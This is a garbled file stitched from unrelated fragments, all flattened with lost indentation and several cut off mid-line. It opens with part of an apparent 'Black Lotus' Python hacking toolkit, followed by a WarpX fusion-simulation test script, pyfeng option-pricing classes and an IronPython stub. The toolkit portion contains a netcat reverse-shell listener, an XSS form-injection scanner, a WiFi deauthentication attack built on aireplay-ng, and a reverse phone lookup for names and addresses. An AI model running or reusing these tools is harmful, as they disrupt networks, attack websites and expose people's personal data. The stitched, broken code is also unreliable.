p = input("\033[37mEnter Phone Number (with carrier number, like +30) \033[31m>\033[37m ")
phoneNumber = phonenumbers.parse(p)
Carrier = carrier.name_for_number(phoneNumber, 'en')
Region = geocoder.description_for_number(phoneNumber, 'en')
print("\n\033[37m====================")
print("\033[34mPhone Number details\033[37m")
print("\033[37m====================")
print("\033[37m# Phone number: \033[31m", p)
print("\033[37m# Carrier: \033[31m", Carrier)
print("\033[37m# Region: \033[31m", Region)
print("\033[37m ")
print("\033[31mDo you want to check the Phonebook for Greek Numbers?")
a = input("\033[31mThis may contain information about Name, Address and more (y/n)\033[37m ")
b = input("Open in megalodon's browser ? (y/n) ")
if b == "y":
a = "y"
elif b == "n":
print("\033[36mLink: \033[31mhttps://www.11888.gr/antistrofh-anazhthsh-me-arithmo-thlefwnou/ \033[37m")
a = "n"
else:
print("Get out of here")
if a == "y":
import tkinterweb
import tkinter as tk
root = tk.Tk()
root.title("Black Lotus Browser: Greek PhoneBook Searcher")
root.geometry("900x450+200+150")
frame = tkinterweb.HtmlFrame(root)
frame.load_website('https://www.11888.gr/antistrofh-anazhthsh-me-arithmo-thlefwnou/')
frame.pack(fill="both", expand=True)
root.mainloop()
else:
print(" ")
#----------------------------------------------------------------------------------------------------------------------
def listener():
b = input("\033[37mEnter Port \033[31m>\033[37m")
os.system("nc -lvnp " + b)
#----------------------------------------------------------------------------------------------------------------------
def xss():
def get_all_forms(url):
soup = bs(requests.get(url).content, "html.parser")
return soup.find_all("form")
def get_form_details(form):
details = {}
action = form.attrs.get("action").lower()
method = form.attrs.get("method", "get").lower()
inputs = []
for input_tag in form.find_all("input"):
input_type = input_tag.attrs.get("type", "text")
input_name = input_tag.attrs.get("name")
inputs.append({"type": input_type, "name": input_name})
details["action"] = action
details["method"] = method
details["inputs"] = inputs
return details
def submit_form(form_details, url, value):
target_url = urljoin(url, form_details["action"])
inputs = form_details["inputs"]
data = {}
for input in inputs:
if input["type"] == "text" or input["type"] == "search":
input["value"] = value
input_name = input.get("name")
input_value = input.get("value")
if input_name and input_value:
data[input_name] = input_value
if form_details["method"] == "post":
return requests.post(target_url, data=data)
else:
return requests.get(target_url, params=data)
def scan_xss(url):
forms = get_all_forms(url)
print(f"\033[37m[\033[31m+\033[37m] Detected {len(forms)} forms on \033[31m{url}\033[37m.")
js_script = "<script>alert('Black Lotus')</script>"
is_vulnerable = False
for form in forms:
form_details = get_form_details(form)
content = submit_form(form_details, url, js_script).content.decode()
if js_script in content:
print(f"\033[37m[\033[31m+\033[37m] XSS Detected on \033[31m{url}\033[37m")
print(f"\033[37m[\033[31m*\033[37m] Form details:\033[31m")
pprint(form_details)
is_vulnerable = True
return is_vulnerable
print("\033[37m ")
if __name__ == "__main__":
url = input("\033[37mEnter URL \033[31m>\033[37m ")
print(scan_xss(url))
print("\033[37m ")
#----------------------------------------------------------------------------------------------------------------------
def atom():
#!/usr/bin/env python3
import subprocess
import re
import csv
import os
import time
import shutil
from datetime import datetime
active_wireless_networks = []
def check_for_essid(essid, lst):
check_status = True
# If no ESSIDs in list add the row
if len(lst) == 0:
return check_status
for item in lst:
if essid in item["ESSID"]:
check_status = False
return check_status
print("""\033[37m
_______ /__/ \033[35m█████╗ ████████╗ ██████╗ ███╗ ███╗\033[37m
|.-----.| ,---[___]* \033[35m██╔══██╗╚══██╔══╝██╔═══██╗████╗ ████║\033[37m
|| || / \033[33mprinter\033[37m \033[35m███████║ ██║ ██║ ██║██╔████╔██║\033[37m
||_____|| _____ / ____ \033[35m██╔══██║ ██║ ██║ ██║██║╚██╔╝██║\033[37m
|o_____+| [o_+_+]--------[=i==] \033[35m██║ ██║ ██║ ╚██████╔╝██║ ╚═╝ ██║\033[37m
|_______| \033[32mwlan0\033[37m drive \033[35m╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝\033[37m
Wifi \033[31mKiller\033[37m
""")
if not 'SUDO_UID' in os.environ.keys():
print("Run this program with sudo.")
for file_name in os.listdir():
if ".csv" in file_name:
print("There shouldn't be any .csv files in your directory. We found .csv files in your directory.")
directory = os.getcwd()
try:
os.mkdir(directory + "/backup/")
except:
print("Backup folder exists.")
timestamp = datetime.now()
shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name)
wlan_pattern = re.compile("^wlan[0-9]+")
check_wifi_result = wlan_pattern.findall(subprocess.run(["iwconfig"], capture_output=True).stdout.decode())
if len(check_wifi_result) == 0:
print("Please connect a WiFi controller and try again.")
loading()
print("The following WiFi interfaces are available:")
for index, item in enumerate(check_wifi_result):
print(f"{index} - {item}")
while True:
wifi_interface_choice = input("Please select the interface you want to use for the attack: ")
try:
if check_wifi_result[int(wifi_interface_choice)]:
break
except:
print("Please enter a number that corresponds with the choices.")
hacknic = check_wifi_result[int(wifi_interface_choice)]
print("\033[37mWiFi adapter connected!\nNow let's kill conflicting processes:\033[37m")
kill_confilict_processes = subprocess.run(["sudo", "airmon-ng", "check", "kill"])
print("Putting Wifi adapter into monitored mode:")
put_in_monitored_mode = subprocess.run(["sudo", "airmon-ng", "start", hacknic])
discover_access_points = subprocess.Popen(["sudo", "airodump-ng","-w" ,"file","--write-interval", "1","--output-format", "csv", hacknic + "mon"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
try:
while True:
subprocess.call("clear", shell=True)
for file_name in os.listdir():
fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
if ".csv" in file_name:
with open(file_name) as csv_h:
csv_h.seek(0)
csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
for row in csv_reader:
if row["BSSID"] == "BSSID":
pass
elif row["BSSID"] == "Station MAC":
break
elif check_for_essid(row["ESSID"], active_wireless_networks):
active_wireless_networks.append(row)
print("Scanning. Press Ctrl+C when you want to select the target wireless network.\n")
print("+---+---------------------+------------+------------------------------+ ")
print("|No |BSSID |Channel |ESSID |")
print("+---+---------------------+------------+------------------------------+")
for index, item in enumerate(active_wireless_networks):
print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}")
time.sleep(1)
except KeyboardInterrupt:
print("\nReady to attack")
while True:
choice = input("\033[37mBlack Lotus(\033[31mattack\033[37m)\033[31m>\033[37m ")
try:
if active_wireless_networks[int(choice)]:
break
except:
print("Please try again.")
hackbssid = active_wireless_networks[int(choice)]["BSSID"]
hackchannel = active_wireless_networks[int(choice)]["channel"].strip()
subprocess.run(["airmon-ng", "start", hacknic + "mon", hackchannel])
subprocess.Popen(["aireplay-ng", "--deauth", "0", "-a", hackbssid, check_wifi_result[int(wifi_interface_choice)] + "mon"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
try:
while True:
print("Deauthenticating clients, press ctrl-c to stop")
except KeyboardInterrupt:
print("Stop monitor mode")
subprocess.run(["airmon-ng", "stop", hacknic + "mon"])
print("\033[31mExiting ATOM!!\033[37m")
#----------------------------------------------------------------------------------------------------------------------
total_urls_visited =0
def links():
colorama.init()
GREEN = colorama.Fore.GREEN
GRAY = colorama.Fore.LIGHTBLACK_EX
RESET = colorama.Fore.RESET
YELLOW = colorama.Fore.YELLOW
internal_urls = set()
external_urls = set()
def is_valid(url):
parsed = urlparse(url)
return bool(parsed.netloc) and bool(parsed.scheme)
def get_all_website_links(url):
urls = set()
domain_name = urlparse(url).netloc
soup = BeautifulSoup(requests.get(url).content, "html.parser")
for a_tag in soup.findAll("a"):
href = a_tag.attrs.get("href")
if href == "" or href is None:
continue
href = urljoin(url, href)
parsed_href = urlparse(href)
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
if not is_valid(href):
continue
if href in internal_urls:
continue
if domain_name not in href:
if href not in external_urls:
print(f"{GRAY}[!] External link: {href}{RESET}")
external_urls.add(href)
continue
print(f"{GREEN}[*] Internal link: {href}{RESET}")
urls.add(href)
internal_urls.add(href)
return urls
def crawl(url, max_urls=30):
global total_urls_visited
total_urls_visited += 1
print(f"{YELLOW}[*] Crawling: {url}{RESET}")
links = get_all_website_links(url)
for link in links:
if total_urls_visited > max_urls:
break
crawl(link, max_urls=max_urls)
if __name__ == "__main__":
crawl(input("\033[37m Enter URL \033[36m>\033[37m "))
print("[+] Total Internal links:", len(internal_urls))
print("[+] Total External links:", len(external_urls))
print("[+] Total URLs:", len(external_urls) + len(internal_urls))
#----------------------------------------------------------------------------------------------------------------------
def subdomain():
domain = input("\033[37mBlack Lotus(\033[36mSubdomain/URL\033[37m) \033[31m>\033[37m ")
dir = input("\033[37mBlack Lotus(\033[36mSubdomain/file\033[37m) \033[31m>\033[37m ")
print("\n\033[36mResults will be saved as 'discovered_subdomains.txt'\033[37m")
file = open(dir)
content = file.read()
subdomains = content.splitlines()
discovered_subdomains = []
for subdomain in subdomains:
url = f"http://{subdomain}.{domain}"
try:
requests.get(url)
except requests.ConnectionError:
pass
else:
print("\033[37m[\033[31m+\033[37m] Discovered subdomain:\033[33m", url)
discovered_subdomains.append(url)
with | |
#! /usr/bin/env python
# Copyright 2021 <NAME>
#
# This file is part of WarpX.
#
# License: BSD-3-Clause-LBNL
import os
import sys
import yt
sys.path.insert(1, '../../../../warpx/Regression/Checksum/')
import checksumAPI
import numpy as np
import scipy.constants as scc
## This script performs various checks for the proton boron nuclear fusion module. The simulation
## that we check is made of 5 different tests, each with different proton, boron and alpha species.
##
## The first test is performed in the proton-boron center of mass frame. It could correspond to the
## physical case of a proton beam colliding with a boron beam. The kinetic energy of the colliding
## particles depends on the cell number in the z direction and varies in the few keV to few MeV
## range. All the particles within a cell have the exact same momentum, which allows detailed
## checks of the energy of produced alpha particles. The proton and boron species have the same
## density and number of particles in this test. The number of produced alphas is much smaller than
## the initial number of protons and borons.
##
## The second test is performed in the boron rest frame. It corresponds to the physical case of a
## low density proton beam colliding with a high-density proton+boron target. The energy of the
## proton beam is varied in the few keV to few MeV range, depending on the cell number in the z
## direction. As in the previous case, all the particles within a cell have the exact same
## momentum, which allows detailed checks of the energy of produced alpha particles. In this test,
## there are 100 immobile boron and 100 immobile proton macroparticles per cell, as well as 900
## beam proton macroparticles per cell. The density of the immobile particles is 6 orders of
## magnitude higher than the number of beam particles, which means that they have a much higher
## weight. This test is similar to the example given in section 3 of Higginson et al.,
## Journal of Computation Physics, 388 439–453 (2019), which was found to be sensitive to the way
## unsampled pairs are accounted for. As before, the number of produced alphas is much smaller than
## the initial number of protons and borons.
##
## The third test corresponds to a Maxwellian plasma with a 44 keV temperature. The alpha yield is
## directly compared to the analytical fits of <NAME> and <NAME>, Nuclear Fusion, 40, 865
## (2000) for a thermal plasma.
##
## The fourth test corresponds to a plasma with an extremely small boron density, so that all boron
## macroparticles should have disappeared by the end of the simulation, which we verify.
##
## The fifth test is exactly the same as the fourth test, except that the
## fusion_probability_threshold parameter is increased to an excessive value. Because of that, we
## severely underestimate the fusion yield and boron macroparticles remain at the end of the
## simulation, which we verify.
##
## In all simulations, we check particle number, charge, momentum and energy conservation and
## perform basic checks regarding the produced particles. When possible, we also compare the number
## of produced macroparticles, fusion yield and energy of the produced particles to theoretical
## values.
##
## Please be aware that the relative tolerances are often set empirically in this analysis script,
## so it would not be surprising that some tolerances need to be increased in the future.
default_tol = 1.e-12 # Default relative tolerance
## Some physical parameters
keV_to_Joule = scc.e*1e3
MeV_to_Joule = scc.e*1e6
barn_to_square_meter = 1.e-28
m_p = scc.m_p # Proton mass
m_b = 10.9298*m_p # Boron 11 mass
m_reduced = m_p*m_b/(m_p+m_b)
m_a = 3.97369*m_p # Alpha mass
m_be = 7.94748*m_p # Beryllium 8 mass
Z_boron = 5.
Z_proton = 1.
E_Gamow = (Z_boron*Z_proton*np.pi*scc.fine_structure)**2*2.*m_reduced*scc.c**2
E_Gamow_MeV = E_Gamow/MeV_to_Joule
E_Gamow_keV = E_Gamow/keV_to_Joule
E_fusion = 8.59009*MeV_to_Joule # Energy released during p + B -> alpha + Be
E_decay = 0.0918984*MeV_to_Joule # Energy released during Be -> 2*alpha
E_fusion_total = E_fusion + E_decay # Energy released during p + B -> 3*alpha
## Some numerical parameters for this test
size_x = 8
size_y = 8
size_z = 16
dV_total = size_x*size_y*size_z # Total simulation volume
# Volume of a slice corresponding to a single cell in the z direction. In tests 1 and 2, all the
# particles of a given species in the same slice have the exact same momentum
dV_slice = size_x*size_y
dt = 1./(scc.c*np.sqrt(3.))
# In test 1 and 2, the energy in cells number i (in z direction) is typically Energy_step * i**2
Energy_step = 22.*keV_to_Joule
def is_close(val1, val2, rtol=default_tol, atol=0.):
## Wrapper around numpy.isclose, used to override the default tolerances.
return np.isclose(val1, val2, rtol=rtol, atol=atol)
def add_existing_species_to_dict(yt_ad, data_dict, species_name, prefix, suffix):
data_dict[prefix+"_px_"+suffix] = yt_ad[species_name, "particle_momentum_x"].v
data_dict[prefix+"_py_"+suffix] = yt_ad[species_name, "particle_momentum_y"].v
data_dict[prefix+"_pz_"+suffix] = yt_ad[species_name, "particle_momentum_z"].v
data_dict[prefix+"_w_"+suffix] = yt_ad[species_name, "particle_weight"].v
data_dict[prefix+"_id_"+suffix] = yt_ad[species_name, "particle_id"].v
data_dict[prefix+"_cpu_"+suffix] = yt_ad[species_name, "particle_cpu"].v
data_dict[prefix+"_z_"+suffix] = yt_ad[species_name, "particle_position_z"].v
def add_empty_species_to_dict(data_dict, species_name, prefix, suffix):
data_dict[prefix+"_px_"+suffix] = np.empty(0)
data_dict[prefix+"_py_"+suffix] = np.empty(0)
data_dict[prefix+"_pz_"+suffix] = np.empty(0)
data_dict[prefix+"_w_"+suffix] = np.empty(0)
data_dict[prefix+"_id_"+suffix] = np.empty(0)
data_dict[prefix+"_cpu_"+suffix] = np.empty(0)
data_dict[prefix+"_z_"+suffix] = np.empty(0)
def add_species_to_dict(yt_ad, data_dict, species_name, prefix, suffix):
try:
## If species exist, we add its data to the dictionary
add_existing_species_to_dict(yt_ad, data_dict, species_name, prefix, suffix)
except yt.utilities.exceptions.YTFieldNotFound:
## If species does not exist, we avoid python crash and add empty arrays to the
## dictionnary. Currently, this happens for the boron species in test number 4, which
## entirely fuses into alphas.
add_empty_species_to_dict(data_dict, species_name, prefix, suffix)
def check_particle_number_conservation(data):
total_w_proton_start = np.sum(data["proton_w_start"])
total_w_proton_end = np.sum(data["proton_w_end"])
total_w_boron_start = np.sum(data["boron_w_start"])
total_w_boron_end = np.sum(data["boron_w_end"])
consumed_proton = total_w_proton_start - total_w_proton_end
consumed_boron = total_w_boron_start - total_w_boron_end
created_alpha = np.sum(data["alpha_w_end"])
assert(consumed_proton >= 0.)
assert(consumed_boron >= 0.)
assert(created_alpha >= 0.)
## Check that number of consumed proton and consumed boron are equal
assert_scale = max(total_w_proton_start, total_w_boron_start)
assert(is_close(consumed_proton, consumed_boron, rtol = 0., atol = default_tol*assert_scale))
## Check that number of consumed particles corresponds to number of produced alpha
## Factor 3 is here because each nuclear fusion reaction produces 3 alphas
assert(is_close(total_w_proton_start, total_w_proton_end + created_alpha/3.))
assert(is_close(total_w_boron_start, total_w_boron_end + created_alpha/3.))
def compute_energy_array(data, species_name, suffix, m):
## Relativistic computation of kinetic energy for a given species
psq_array = data[species_name+'_px_'+suffix]**2 + data[species_name+'_py_'+suffix]**2 + \
data[species_name+'_pz_'+suffix]**2
rest_energy = m*scc.c**2
return np.sqrt(psq_array*scc.c**2 + rest_energy**2) - rest_energy
def check_energy_conservation(data):
proton_energy_start = compute_energy_array(data, "proton", "start", m_p)
proton_energy_end = compute_energy_array(data, "proton", "end", m_p)
boron_energy_start = compute_energy_array(data, "boron", "start", m_b)
boron_energy_end = compute_energy_array(data, "boron", "end", m_b)
alpha_energy_end = compute_energy_array(data, "alpha", "end", m_a)
total_energy_start = np.sum(proton_energy_start*data["proton_w_start"]) + \
np.sum(boron_energy_start*data["boron_w_start"])
total_energy_end = np.sum(proton_energy_end*data["proton_w_end"]) + \
np.sum(boron_energy_end*data["boron_w_end"]) + \
np.sum(alpha_energy_end*data["alpha_w_end"])
## Factor 3 is here because each nuclear fusion reaction produces 3 alphas
n_fusion_reaction = np.sum(data["alpha_w_end"])/3.
assert(is_close(total_energy_end,
total_energy_start + n_fusion_reaction*E_fusion_total,
rtol = 1.e-8))
def check_momentum_conservation(data):
proton_total_px_start = np.sum(data["proton_px_start"]*data["proton_w_start"])
proton_total_py_start = np.sum(data["proton_py_start"]*data["proton_w_start"])
proton_total_pz_start = np.sum(data["proton_pz_start"]*data["proton_w_start"])
proton_total_px_end = np.sum(data["proton_px_end"]*data["proton_w_end"])
proton_total_py_end = np.sum(data["proton_py_end"]*data["proton_w_end"])
proton_total_pz_end = np.sum(data["proton_pz_end"]*data["proton_w_end"])
boron_total_px_start = np.sum(data["boron_px_start"]*data["boron_w_start"])
boron_total_py_start = np.sum(data["boron_py_start"]*data["boron_w_start"])
boron_total_pz_start = np.sum(data["boron_pz_start"]*data["boron_w_start"])
boron_total_px_end = np.sum(data["boron_px_end"]*data["boron_w_end"])
boron_total_py_end = np.sum(data["boron_py_end"]*data["boron_w_end"])
boron_total_pz_end = np.sum(data["boron_pz_end"]*data["boron_w_end"])
alpha_total_px_end = np.sum(data["alpha_px_end"]*data["alpha_w_end"])
alpha_total_py_end = np.sum(data["alpha_py_end"]*data["alpha_w_end"])
alpha_total_pz_end = np.sum(data["alpha_pz_end"]*data["alpha_w_end"])
total_px_start = proton_total_px_start + boron_total_px_start
total_py_start = proton_total_py_start + boron_total_py_start
total_pz_start = proton_total_pz_start + boron_total_pz_start
total_px_end = proton_total_px_end + boron_total_px_end + alpha_total_px_end
total_py_end = proton_total_py_end + boron_total_py_end + alpha_total_py_end
total_pz_end = proton_total_pz_end + boron_total_pz_end + alpha_total_pz_end
## Absolute tolerance is needed because sometimes the initial momentum is exactly 0
assert(is_close(total_px_start, total_px_end, atol=1.e-15))
assert(is_close(total_py_start, total_py_end, atol=1.e-15))
assert(is_close(total_pz_start, total_pz_end, atol=1.e-15))
def check_id(data):
## Check that all created particles have unique id + cpu identifier (two particles with
## different cpu can have the same id)
complex_id = data["alpha_id_end"] + 1j*data["alpha_cpu_end"]
assert(complex_id.shape == np.unique(complex_id).shape)
def basic_product_particles_check(data):
## For each nuclear fusion reaction in the code, we create 6 alpha macroparticles. So the
## total number of alpha macroparticles must be a multiple of 6.
num_alpha = data["alpha_w_end"].shape[0]
assert(num_alpha%6 == 0)
## The weight of the 6 macroparticles coming from a single fusion event should be the same.
## We verify this here.
assert(np.array_equal(data["alpha_w_end"][::6], data["alpha_w_end"][1::6]))
assert(np.array_equal(data["alpha_w_end"][::6], data["alpha_w_end"][2::6]))
assert(np.array_equal(data["alpha_w_end"][::6], data["alpha_w_end"][3::6]))
assert(np.array_equal(data["alpha_w_end"][::6], data["alpha_w_end"][4::6]))
assert(np.array_equal(data["alpha_w_end"][::6], data["alpha_w_end"][5::6]))
## When we create 6 macroparticles, the first has the exact same momentum as the second, the
## third has the same as the fourth and the fifth has the same as the sixth. We verify this
## here
assert(np.array_equal(data["alpha_px_end"][::6], data["alpha_px_end"][1::6]))
assert(np.array_equal(data["alpha_py_end"][::6], data["alpha_py_end"][1::6]))
assert(np.array_equal(data["alpha_pz_end"][::6], data["alpha_pz_end"][1::6]))
assert(np.array_equal(data["alpha_px_end"][2::6], data["alpha_px_end"][3::6]))
assert(np.array_equal(data["alpha_py_end"][2::6], data["alpha_py_end"][3::6]))
assert(np.array_equal(data["alpha_pz_end"][2::6], data["alpha_pz_end"][3::6]))
assert(np.array_equal(data["alpha_px_end"][4::6], | |
<gh_stars>0
import scipy.stats as spst
import warnings
import numpy as np
from itertools import product, combinations
from . import bsm
from . import norm
from . import gamma
from . import nsvh
from . import opt_abc as opt
class BsmSpreadKirk(opt.OptMaABC):
"""
Kirk's approximation for spread option.
References:
<NAME>. (1995). Correlation in the energy markets. In Managing Energy Price Risk
(First, pp. 71–78). Risk Publications.
Examples:
>>> import numpy as np
>>> import pyfeng as pf
>>> m = pf.BsmSpreadKirk((0.2, 0.3), cor=-0.5)
>>> m.price(np.arange(-2, 3) * 10, [100, 120], 1.3)
array([22.15632247, 17.18441817, 12.98974214, 9.64141666, 6.99942072])
"""
weight = np.array([1, -1])
def price(self, strike, spot, texp, cp=1):
df = np.exp(-texp * self.intr)
fwd = np.array(spot) * (
1.0 if self.is_fwd else np.exp(-texp * np.array(self.divr)) / df
)
assert fwd.shape[-1] == self.n_asset
fwd1 = fwd[..., 0] - np.minimum(strike, 0)
fwd2 = fwd[..., 1] + np.maximum(strike, 0)
sig1 = self.sigma[0] * fwd[..., 0] / fwd1
sig2 = self.sigma[1] * fwd[..., 1] / fwd2
sig_spd = np.sqrt(sig1 * (sig1 - 2.0 * self.rho * sig2) + sig2 ** 2)
price = bsm.Bsm.price_formula(fwd2, fwd1, sig_spd, texp, cp=cp, is_fwd=True)
return df * price
class BsmSpreadBjerksund2014(opt.OptMaABC):
"""
Bjerksund & Stensland (2014)'s approximation for spread option.
References:
<NAME>., & <NAME>. (2014). Closed form spread option valuation.
Quantitative Finance, 14(10), 1785–1794. https://doi.org/10.1080/14697688.2011.617775
Examples:
>>> import numpy as np
>>> import pyfeng as pf
>>> m = pf.BsmSpreadBjerksund2014((0.2, 0.3), cor=-0.5)
>>> m.price(np.arange(-2, 3) * 10, [100, 120], 1.3)
array([22.13172022, 17.18304247, 12.98974214, 9.54431944, 6.80612597])
"""
weight = np.array([1, -1])
def price(self, strike, spot, texp, cp=1):
df = np.exp(-texp * self.intr)
fwd = np.array(spot) * (
1.0 if self.is_fwd else np.exp(-texp * np.array(self.divr)) / df
)
assert fwd.shape[-1] == self.n_asset
fwd1 = fwd[..., 0]
fwd2 = fwd[..., 1]
std11 = self.sigma[0] ** 2 * texp
std12 = self.sigma[0] * self.sigma[1] * texp
std22 = self.sigma[1] ** 2 * texp
aa = fwd2 + strike
bb = fwd2 / aa
std = np.sqrt(std11 - 2 * bb * self.rho * std12 + bb ** 2 * std22)
d3 = np.log(fwd1 / aa)
d1 = (d3 + 0.5 * std11 - bb * (self.rho * std12 - 0.5 * bb * std22)) / std
d2 = (d3 - 0.5 * std11 + self.rho * std12 + bb * (0.5 * bb - 1) * std22) / std
d3 = (d3 - 0.5 * std11 + 0.5 * bb ** 2 * std22) / std
price = cp * (
fwd1 * spst.norm.cdf(cp * d1)
- fwd2 * spst.norm.cdf(cp * d2)
- strike * spst.norm.cdf(cp * d3)
)
return df * price
class NormBasket(opt.OptMaABC):
"""
Basket option pricing under the multiasset Bachelier model
"""
weight = None
def __init__(self, sigma, cor=None, weight=None, intr=0.0, divr=0.0, is_fwd=False):
"""
Args:
sigma: model volatilities of `n_asset` assets. (n_asset, ) array
cor: correlation. If matrix, used as it is. (n_asset, n_asset)
If scalar, correlation matrix is constructed with all same off-diagonal values.
weight: asset weights, If None, equally weighted as 1/n_asset
If scalar, equal weights of the value
If 1-D array, uses as it is. (n_asset, )
intr: interest rate (domestic interest rate)
divr: vector of dividend/convenience yield (foreign interest rate) 0-D or (n_asset, ) array
is_fwd: if True, treat `spot` as forward price. False by default.
"""
super().__init__(sigma, cor=cor, intr=intr, divr=divr, is_fwd=is_fwd)
if weight is None:
self.weight = np.ones(self.n_asset) / self.n_asset
elif np.isscalar(weight):
self.weight = np.ones(self.n_asset) * weight
else:
assert len(weight) == self.n_asset
self.weight = np.array(weight)
def price(self, strike, spot, texp, cp=1):
df = np.exp(-texp * self.intr)
fwd = np.array(spot) * (
1.0 if self.is_fwd else np.exp(-texp * np.array(self.divr)) / df
)
assert fwd.shape[-1] == self.n_asset
fwd_basket = fwd @ self.weight
vol_basket = np.sqrt(self.weight @ self.cov_m @ self.weight)
price = norm.Norm.price_formula(
strike, fwd_basket, vol_basket, texp, cp=cp, is_fwd=True
)
return df * price
class NormSpread(opt.OptMaABC):
"""
Spread option pricing under the Bachelier model.
This is a special case of NormBasket with weight = (1, -1)
Examples:
>>> import numpy as np
>>> import pyfeng as pf
>>> m = pf.NormSpread((20, 30), cor=-0.5, intr=0.05)
>>> m.price(np.arange(-2, 3) * 10, [100, 120], 1.3)
array([17.95676186, 13.74646821, 10.26669936, 7.47098719, 5.29057157])
"""
weight = np.array([1, -1])
price = NormBasket.price
class BsmBasketLevy1992(NormBasket):
"""
Basket option pricing with the log-normal approximation of Levy & Turnbull (1992)
References:
- <NAME>., & <NAME>. (1992). Average intelligence. Risk, 1992(2), 53–57.
- <NAME>., <NAME>., <NAME>., & <NAME>. (2004). An analysis of pricing methods for basket options.
Wilmott Magazine, 2004(7), 82–89.
Examples:
>>> import numpy as np
>>> import pyfeng as pf
>>> strike = np.arange(50, 151, 10)
>>> m = pf.BsmBasketLevy1992(sigma=0.4*np.ones(4), cor=0.5)
>>> m.price(strike, spot=100*np.ones(4), texp=5)
array([54.34281026, 47.521086 , 41.56701301, 36.3982413 , 31.92312156,
28.05196621, 24.70229571, 21.800801 , 19.28360474, 17.09570196,
15.19005654])
"""
def price(self, strike, spot, texp, cp=1):
df = np.exp(-texp * self.intr)
fwd = np.array(spot) * (
1.0 if self.is_fwd else np.exp(-texp * np.array(self.divr)) / df
)
assert fwd.shape[-1] == self.n_asset
fwd_basket = fwd * self.weight
m1 = np.sum(fwd_basket, axis=-1)
m2 = np.sum(fwd_basket @ np.exp(self.cov_m * texp) * fwd_basket, axis=-1)
sig = np.sqrt(np.log(m2 / (m1 ** 2)) / texp)
price = bsm.Bsm.price_formula(strike, m1, sig, texp, cp=cp, is_fwd=True)
return df * price
class BsmBasketMilevsky1998(NormBasket):
"""
Basket option pricing with the inverse gamma distribution of Milevsky & Posner (1998)
References:
<NAME>., & <NAME>. (1998). A Closed-Form Approximation for Valuing Basket Options.
The Journal of Derivatives, 5(4), 54–61. https://doi.org/10.3905/jod.1998.408005
<NAME>., <NAME>., <NAME>., & <NAME>. (2004). An analysis of pricing methods for basket options.
Wilmott Magazine, 2004(7), 82–89.
Examples:
>>> import numpy as np
>>> import pyfeng as pf
>>> strike = np.arange(50, 151, 10)
>>> m = pf.BsmBasketMilevsky1998(sigma=0.4*np.ones(4), cor=0.5)
>>> m.price(strike, spot=100*np.ones(4), texp=5)
array([51.93069524, 44.40986 , 38.02596564, 32.67653542, 28.21560931,
24.49577509, 21.38543199, 18.77356434, 16.56909804, 14.69831445,
13.10186928])
"""
def price(self, strike, spot, texp, cp=1):
df = np.exp(-texp * self.intr)
fwd = np.array(spot) * (
1.0 if self.is_fwd else np.exp(-texp * np.array(self.divr)) / df
)
assert fwd.shape[-1] == self.n_asset
fwd_basket = fwd * self.weight
m1 = np.sum(fwd_basket, axis=-1)
m2 = np.sum(fwd_basket @ np.exp(self.cov_m * texp) * fwd_basket, axis=-1)
alpha = 1 / (m2 / m1 ** 2 - 1) + 2
beta = (alpha - 1) * m1
price = gamma.InvGam.price_formula(
strike, m1, texp, alpha, beta, cp=cp, is_fwd=True
)
return df * price
class BsmMax2(opt.OptMaABC):
"""
Option on the max of two assets.
Payout = max( max(F_1, F_2) - K, 0 ) for all or max( K - max(F_1, F_2), 0 ) for put option
References:
<NAME>. (1991). Somewhere Over the Rainbow. Risk, 1991(11), 63–66.
Examples:
>>> import numpy as np
>>> import pyfeng as pf
>>> m = pf.BsmMax2(0.2*np.ones(2), cor=0, divr=0.1, intr=0.05)
>>> m.price(strike=[90, 100, 110], spot=100*np.ones(2), texp=3)
array([15.86717049, 11.19568103, 7.71592217])
"""
m_switch = None
def __init__(self, sigma, cor=None, weight=None, intr=0.0, divr=0.0, is_fwd=False):
super().__init__(sigma, cor=cor, intr=intr, divr=divr, is_fwd=is_fwd)
self.m_switch = BsmSpreadKirk(sigma, cor, is_fwd=True)
def price(self, strike, spot, texp, cp=1):
sig = self.sigma
df = np.exp(-texp * self.intr)
fwd = np.array(spot) * (
1.0 if self.is_fwd else np.exp(-texp * np.array(self.divr)) / df
)
assert fwd.shape[-1] == self.n_asset
sig_std = sig * np.sqrt(texp)
spd_rho = np.sqrt(np.dot(sig, sig) - 2 * self.rho * sig[0] * sig[1])
spd_std = spd_rho * np.sqrt(texp)
# -x and y as rows
# supposed to be -log(fwd/strike) but strike is added later
xx = -np.log(fwd) / sig_std - 0.5 * sig_std
fwd_ratio = fwd[0] / fwd[1]
yy = np.log([fwd_ratio, 1 / fwd_ratio]) / spd_std + 0.5 * spd_std
rho12 = (
np.array([self.rho * sig[1] - sig[0], self.rho * sig[0] - sig[1]]) / spd_rho
)
mu0 = np.zeros(2)
cor_m1 = rho12[0] + (1 - rho12[0]) * np.eye(2)
cor_m2 = rho12[1] + (1 - rho12[1]) * np.eye(2)
strike_isscalar = np.isscalar(strike)
strike = np.atleast_1d(strike)
cp = cp * np.ones_like(strike)
n_strike = len(strike)
# this is the price of max(S1, S2) = max(S1-S2, 0) + S2
# Used that Kirk approximation strike = 0 is Margrabe's switch option price
parity = 0 if np.all(cp > 0) else self.m_switch.price(0, fwd, texp) + fwd[1]
price = np.zeros_like(strike, | |
ReparsePoint (1024), SparseFile (512), System (4), Temporary (256)
"""
def __eq__(self, *args): #cannot find CLR method
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self, *args): #cannot find CLR method
""" __format__(formattable: IFormattable, format: str) -> str """
pass
def __ge__(self, *args): #cannot find CLR method
pass
def __gt__(self, *args): #cannot find CLR method
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self, *args): #cannot find CLR method
pass
